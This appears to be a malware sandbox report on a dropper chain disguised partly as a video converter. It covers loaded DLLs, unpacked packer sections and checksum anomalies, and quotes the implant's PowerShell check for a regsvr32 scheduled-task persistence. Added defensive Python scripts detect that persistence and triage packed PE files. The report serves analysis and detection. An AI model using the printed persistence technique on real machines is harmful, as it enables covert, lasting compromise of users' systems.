Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp Section loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmpSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062123001\f46bdbcca4.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: msimg32.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: mpr.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: textinputframework.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: coreuicomponents.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: coremessaging.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: shfolder.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: rstrtmgr.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: textshaping.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: dwmapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: explorerframe.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmpSection loaded: sfc_os.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\regsvr32.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Window found: window name: TMainForm
                            Source: Window Recorder | Window detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                            Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Flv to AVI Converter_is1
                            Source: AApUa7VQiy.exe | Static file information: File size 1850880 > 1048576
                            Source: AApUa7VQiy.exe | Static PE information: Raw size of litpxdqa is bigger than: 0x100000 < 0x197200
                            Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: f46bdbcca4.tmp, 00000020.00000003.2055762114.00000000034D8000.00000004.00001000.00020000.00000000.sdmp, f46bdbcca4.tmp, 00000020.00000003.2051282895.00000000031A0000.00000004.00001000.00020000.00000000.sdmp

                            Data Obfuscation

                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe | Unpacked PE file: 3.2.ES0PERDCSSGNQK1XTMK282189FFMR8.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzipjhra:EW;iworeitq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzipjhra:EW;iworeitq:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe | Unpacked PE file: 6.2.BEB973FPO2R62ZWABVOVP8TC.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 7.2.skotes.exe.20000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 8.2.skotes.exe.20000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Unpacked PE file: 9.2.skotes.exe.20000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | Unpacked PE file: 12.2.flv2aviconverter24.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe | Unpacked PE file: 15.2.ktIplF5.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mzomafvq:EW;rxmgvynz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mzomafvq:EW;rxmgvynz:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe | Unpacked PE file: 30.2.df1b740bf8.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jxlmjtji:EW;pjewfnhk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jxlmjtji:EW;pjewfnhk:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\flv2aviconverter24.exe | Unpacked PE file: 12.2.flv2aviconverter24.exe.400000.0.unpack
                            Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
                            Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
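The two regsvr32 -> powershell rows above show the implant asking Get-ScheduledTask whether a task exists whose action is regsvr32 /S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv, i.e. the payload verifying its own persistence. regsvr32 hands the text after /i: to the module's DllInstall export, so the task is both the autostart and a configuration channel. The script below is an added hunt for that pattern, not code from the report or from the sample: it reads Task Scheduler XML of the shape stored under C:\Windows\System32\Tasks and flags regsvr32 actions whose target is not a library extension or lives in a user-writable directory. The three task documents, their names and the vendor paths are constructed for the demonstration.

```python
"""Hunt for the persistence that the regsvr32 -> powershell rows above are verifying:
a scheduled task whose action is regsvr32 /S /i:<arg> <file> with the file outside
any library extension and under a user-writable path. Added example, not the
report's or the sample's code; the task documents below are constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
USER_WRITABLE = re.compile(r"\\(AppData|ProgramData|Temp|Public|Downloads)\\", re.I)
LIBRARY_EXT = (".dll", ".ocx", ".ax", ".cpl")   # what regsvr32 legitimately registers


def exec_actions(task: ET.Element):
    """Yield (command, arguments) for every <Exec> action of a task document."""
    for ex in task.findall(".//t:Actions/t:Exec", NS):
        yield (ex.findtext("t:Command", default="", namespaces=NS).strip(),
               ex.findtext("t:Arguments", default="", namespaces=NS).strip())


def split_args(args: str) -> list:
    """Tokenize a command line, keeping quoted paths with spaces whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', args)]


def assess_regsvr32(command: str, args: str) -> dict:
    """Score one action; anything that is not regsvr32 comes back unflagged."""
    exe = command.strip('"').lower()
    if exe not in ("regsvr32", "regsvr32.exe") and not exe.endswith("\\regsvr32.exe"):
        return {"regsvr32": False, "flag": False, "target": "", "reasons": []}
    tokens = split_args(args)
    reasons, flag = [], False
    if any(t.lower() == "/s" for t in tokens):
        reasons.append("/S: silent, no error dialog if the module fails")
    for t in tokens:
        if t.lower().startswith("/i:"):
            # regsvr32 passes the text after /i: to the module's DllInstall export,
            # so the task carries the payload's configuration as well as its autostart
            reasons.append(f"/i:{t[3:]} passed to DllInstall")
    targets = [t for t in tokens if not t.startswith("/")]
    target = targets[-1] if targets else ""
    if target and not target.lower().endswith(LIBRARY_EXT):
        reasons.append(f"target {target!r} is not a library extension")
        flag = True
    if USER_WRITABLE.search(target):
        reasons.append(f"target {target!r} is in a user-writable directory")
        flag = True
    return {"regsvr32": True, "flag": flag, "target": target, "reasons": reasons}


def hunt(tasks: dict) -> list:
    """tasks maps a task name to its parsed XML root; returns (name, verdict) for flagged actions."""
    hits = []
    for name, root in tasks.items():
        for command, args in exec_actions(root):
            verdict = assess_regsvr32(command, args)
            if verdict["flag"]:
                hits.append((name, verdict))
    return hits


def task_xml(command: str, arguments: str) -> str:
    # Constructed Task Scheduler document reduced to the parts the hunt reads.
    return (f'<Task version="1.2" xmlns="{NS["t"]}"><Actions Context="Author"><Exec>'
            f"<Command>{command}</Command><Arguments>{arguments}</Arguments></Exec></Actions></Task>")


# Constructed tasks: the report's regsvr32 action, a vendor updater and a regsvr32 of a real DLL.
TASKS = {name: ET.fromstring(xml) for name, xml in {
    "\\Demo\\SyncTask": task_xml("regsvr32", "/S /i:SYNC C:\\Users\\user\\AppData\\Roaming\\uxtheme_2.drv"),
    "\\Demo\\VendorUpdater": task_xml('"C:\\Program Files\\Vendor\\updater.exe"', "/silent"),
    "\\Demo\\RegisterCodec": task_xml("C:\\Windows\\System32\\regsvr32.exe", '/s "C:\\Program Files\\Vendor\\codec.dll"'),
}.items()}

if __name__ == "__main__":
    for name, verdict in hunt(TASKS):
        print(name, verdict["target"], *verdict["reasons"], sep="\n  ")
```

On a live host, build the dictionary from the task files themselves, for example {path: ET.parse(path).getroot()} over the C:\Windows\System32\Tasks tree; ET.parse handles the UTF-16 encoding those files are stored in. A .drv under Roaming is the rename the report's "suspicious file extension" signature fires on, which is why .drv is deliberately absent from LIBRARY_EXT.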
                            Source: random[2].exe2.9.dr | Static PE information: 0xB9EE827D [Tue Nov 6 08:25:33 2068 UTC]
                            Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
                            Source: is-PJU74.tmp.11.dr | Static PE information: real checksum: 0x0 should be: 0x1b9553
                            Source: random[2].exe0.9.dr | Static PE information: real checksum: 0x1bc4aa should be: 0x1c46c8
                            Source: infinity.exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x394f14
                            Source: ktIplF5.exe.9.dr | Static PE information: real checksum: 0x1dac20 should be: 0x1daeb9
                            Source: 513076b4b2.exe.9.dr | Static PE information: real checksum: 0x1bc4aa should be: 0x1c46c8
                            Source: _setup64.tmp.32.dr | Static PE information: real checksum: 0x0 should be: 0x8546
                            Source: 62950fb3a8.exe.9.dr | Static PE information: real checksum: 0x6375a6 should be: 0x637c28
                            Source: random[4].exe.9.dr | Static PE information: real checksum: 0x1d0dd0 should be: 0x1cca80
                            Source: d37c6a3c82.exe.9.dr | Static PE information: real checksum: 0x1daff3 should be: 0x1e47c9
                            Source: random[2].exe1.9.dr | Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
                            Source: ktIplF5[1].exe.9.dr | Static PE information: real checksum: 0x1dac20 should be: 0x1daeb9
                            Source: AApUa7VQiy.exe | Static PE information: real checksum: 0x1cccf4 should be: 0x1c7af4
                            Source: f46bdbcca4.tmp.33.dr | Static PE information: real checksum: 0x0 should be: 0x122532
                            Source: is-TBCD3.tmp.11.dr | Static PE information: real checksum: 0x0 should be: 0x14980c
                            Source: infinity[1].exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x394f14
                            Source: random[1].exe0.9.dr | Static PE information: real checksum: 0xfd7f5 should be: 0xfdb14
                            Source: BEB973FPO2R62ZWABVOVP8TC.exe.0.dr | Static PE information: real checksum: 0x2e8a3c should be: 0x2f1b0b
                            Source: random[3].exe1.9.dr | Static PE information: real checksum: 0xf210b should be: 0xb526d
                            Source: _iscrypt.dll.11.dr | Static PE information: real checksum: 0x0 should be: 0x89d2
                            Source: 61f0c6628c.exe.9.dr | Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
                            Source: df1b740bf8.exe.9.dr | Static PE information: real checksum: 0x1da53e should be: 0x1d2bf2
                            Source: is-2E87P.tmp.11.dr | Static PE information: real checksum: 0x0 should be: 0xb1202
                            Source: is-0DEO7.tmp.34.dr | Static PE information: real checksum: 0x0 should be: 0x1308eb
                            Source: random[1].exe1.9.dr | Static PE information: real checksum: 0x1da53e should be: 0x1d2bf2
                            Source: infinity.tmp.10.dr | Static PE information: real checksum: 0x0 should be: 0xb6f3c
                            Source: 6299d9e5a5.exe.9.dr | Static PE information: real checksum: 0xf210b should be: 0xb526d
                            Source: f46bdbcca4.exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x16fc42
                            Source: _setup64.tmp.34.dr | Static PE information: real checksum: 0x0 should be: 0x8546
                            Source: skotes.exe.6.dr | Static PE information: real checksum: 0x2e8a3c should be: 0x2f1b0b
                            Source: a6c5834e2f.exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x3a0195
                            Source: _isdecmp.dll.32.dr | Static PE information: real checksum: 0x0 should be: 0x5528
                            Source: random[3].exe0.9.dr | Static PE information: real checksum: 0x1daff3 should be: 0x1e47c9
                            Source: 179187318e.exe.9.dr | Static PE information: real checksum: 0xfd7f5 should be: 0xfdb14
                            Source: random[2].exe.9.dr | Static PE information: real checksum: 0x6375a6 should be: 0x637c28
                            Source: f46bdbcca4.tmp.31.dr | Static PE information: real checksum: 0x0 should be: 0x122532
                            Source: _isdecmp.dll.34.dr | Static PE information: real checksum: 0x0 should be: 0x5528
                            Source: random[1].exe2.9.dr | Static PE information: real checksum: 0x0 should be: 0x16fc42
                            Source: random[1].exe.9.dr | Static PE information: real checksum: 0x0 should be: 0x3a0195
                            Source: ES0PERDCSSGNQK1XTMK282189FFMR8.exe.0.dr | Static PE information: real checksum: 0x1bc4aa should be: 0x1c46c8
                            Source: 072d564b60.exe.9.dr | Static PE information: real checksum: 0x1d0dd0 should be: 0x1cca80
                            Source: is-M72JG.tmp.34.dr | Static PE information: real checksum: 0x319701 should be: 0x30ff91
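The rows from the unpack listing down to the checksum table describe one packer layout repeated across the dropped executables: section names that are blank, random eight-letter strings or .taggant, all of them writable and executable once unpacked, the entry point inside .taggant, a stored CheckSum that does not match the file, and in one case a link timestamp in 2068. The block below is an added triage script, not part of the report or of the sample. It reimplements those checks with the standard library only, including the imagehlp checksum arithmetic, and runs them on a PE32 it constructs itself from header facts quoted in the report (the section list and 0x1cccf4 stored checksum of AApUa7VQiy.exe, the 0xB9EE827D stamp of random[2].exe2.9.dr); the section contents, virtual addresses and alignment in that sample are synthetic.

```python
"""Static triage for the packer indicators reported above: writable+executable
sections, an entry point in .taggant, a stored checksum that is not the real one,
blank or random section names and a TimeDateStamp in the future. Standard library
only (no pefile). build_sample_pe() makes a constructed PE32 for the demo."""
import struct
import time

EXEC, READ, WRITE = 0x20000000, 0x40000000, 0x80000000
STANDARD = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata", ".edata",
            ".pdata", ".bss", ".tls", ".xdata", ".CRT", "CODE", "DATA", "BSS"}

def checksum_field_offset(data: bytes) -> int:
    # e_lfanew + signature (4) + COFF header (20) + 64: CheckSum is at +64 in PE32 and PE32+
    return struct.unpack_from("<I", data, 0x3C)[0] + 24 + 64

def pe_checksum(data: bytes, skip_offset: int) -> int:
    """Same arithmetic as imagehlp CheckSumMappedFile: sum every dword except the
    CheckSum field with end-around carry, fold to 16 bits, add the file length."""
    padded = data + b"\0" * (-len(data) % 4)
    skip, total = skip_offset & ~3, 0
    for i in range(0, len(padded), 4):
        if i == skip:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)

def with_checksum(data: bytes, value: int) -> bytes:
    off = checksum_field_offset(data)   # overwrite OptionalHeader.CheckSum, as a linker does
    return data[:off] + struct.pack("<I", value) + data[off + 4:]

def classify(name: str) -> str:
    if not name:
        return "blank"
    if name.startswith("/") and name[1:].isdigit():
        return "long-name"   # COFF string-table reference; GNU binutils emits these, weak signal on its own
    return "standard" if name in STANDARD else "nonstandard"

def analyze_pe(data: bytes, now: int = 0) -> dict:
    now = now or int(time.time())
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    _, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = pe_checksum(data, checksum_field_offset(data))
    sections, entry_section, findings = [], None, []
    for i in range(nsec):
        raw, vsize, va, rsize, *_, flags = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        name = raw.rstrip(b"\0").decode("latin-1").strip()
        kind, wx = classify(name), bool(flags & EXEC and flags & WRITE)
        sections.append({"name": name, "kind": kind, "wx": wx})
        if va <= entry < va + max(vsize, rsize):
            entry_section = name
        if kind in ("blank", "nonstandard"):
            findings.append(f"section name {name!r} is {kind}")
        if wx:
            findings.append(f"section {name!r} is writable and executable")
    if entry_section not in (".text", "CODE"):
        findings.append(f"entry point is pointing to: {entry_section!r}")
    if stored != computed:   # 0 only means unset; a non-zero mismatch means the file changed after linking
        findings.append(f"real checksum: {stored:#x} should be: {computed:#x}")
    if stamp == 0 or stamp > now:
        findings.append(f"TimeDateStamp {stamp:#x} is {'zero' if stamp == 0 else 'in the future'}")
    return {"sections": sections, "entry_section": entry_section, "stored_checksum": stored,
            "computed_checksum": computed, "timestamp": stamp, "findings": findings}

def build_sample_pe(sections, entry_rva, timestamp, stored_checksum) -> bytes:
    """Constructed minimal PE32: real headers plus one file-aligned page per section.
    Not loadable, but every field the triage reads is genuine."""
    align = 0x200
    size_of_headers = -(-(0x40 + 24 + 224 + 40 * len(sections)) // align) * align
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), timestamp, 0, 0, 224, 0x102)
    opt = struct.pack("<HBBIIIIIIIII", 0x10B, 14, 0, 0, 0, 0, entry_rva, 0x1000, 0, 0x400000, 0x1000, align)
    opt += struct.pack("<HHHHHHIIII", 6, 0, 0, 0, 6, 0, 0, 0x10000, size_of_headers, stored_checksum)
    opt += struct.pack("<HHIIIIII", 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16) + b"\0" * 128
    hdrs, body, raw_ptr = b"", b"", size_of_headers
    for name, va, flags in sections:
        hdrs += struct.pack("<8sIIIIIIHHI", name, align, va, align, raw_ptr, 0, 0, 0, 0, flags)
        body, raw_ptr = body + b"\x90" * align, raw_ptr + align
    head = dos + b"PE\0\0" + coff + opt + hdrs
    return head + b"\0" * (size_of_headers - len(head)) + body

# Section names, rights, entry section, stamp and stored checksum follow the report's
# rows; the bytes themselves are synthetic.
SAMPLE = build_sample_pe(
    [(b"", 0x1000, EXEC | READ | WRITE), (b".idata", 0x2000, READ | WRITE),
     (b"", 0x3000, EXEC | READ | WRITE), (b"litpxdqa", 0x4000, EXEC | READ | WRITE),
     (b"jzjfpldr", 0x5000, EXEC | READ | WRITE), (b".taggant", 0x6000, EXEC | READ | WRITE)],
    entry_rva=0x6010, timestamp=0xB9EE827D, stored_checksum=0x1CCCF4)
if __name__ == "__main__":
    for line in analyze_pe(SAMPLE)["findings"]:
        print(line)
```

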